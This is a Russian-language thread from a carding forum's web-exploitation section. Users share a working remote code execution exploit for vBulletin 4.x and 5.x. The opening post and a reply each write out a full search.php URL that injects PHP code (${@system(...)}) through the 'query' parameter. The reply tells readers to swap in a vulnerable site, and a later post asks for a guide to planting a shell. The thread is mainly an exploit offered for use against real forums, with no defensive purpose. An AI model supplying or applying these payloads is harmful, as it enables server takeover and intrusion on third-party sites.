1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

как использовать эту уявимость для Bulletin v4.x.x and 5.х.x

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем Fishred, 2 апр 2014.

  1. TopicStarter Overlay
    Fishred

    Fishred Гость

    Как именно надо использовать данную уязвимость есть гденибуть инструкция?

    -Уязвимость продается тут: Please login or register to view links
    -Уязвимые версии: vBulletin v4.x.x and 5.х.x
    -Цена на офф. сайте: 7000$
    -Распространенность на 02.03.2014: 5/5
    -Платформа: PHP
    -Возможности: Shell Upload / Remote Code Execute


    [Продаваемая уязвимость]

    search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
    # "query" param
    # php code to inject : ${@system('put command here')
     
    • Like Like x 3
    Метки:
  2. RisenNub

    RisenNub

    Регистрация:
    9 сен 2013
    Сообщения:
    90
    Симпатии:
    161
    Легко и просто, "${@system('Выполним этот код от имени root')", в php функция system выполняет внесению программу о и отбражает её вывод.
    Например получить список директорий и файлов: system('ls');
     
    • Like Like x 1
  3. TopicStarter Overlay
    Fishred

    Fishred Гость

    а как это сделать через какую программу и где можно подробрнее?
     
  4. RisenNub

    RisenNub

    Регистрация:
    9 сен 2013
    Сообщения:
    90
    Симпатии:
    161
    Не каких программ не нужно вовсе.
    ----
    Код:
    http://www.site.ru/search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= ${@system('pwd')}&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
    ----
    Это же ссылка! Please login or register to view links замени на уязвимый сайт.;)
     
    • Like Like x 1
  5. TopicStarter Overlay
    anontheops051

    anontheops051 Гость

    бро можешь пожалуйста специально мануал сделать, как все правильно запилить этот шел, думаю все благодарны будут тебе.
     

Поделиться этой страницей

Загрузка...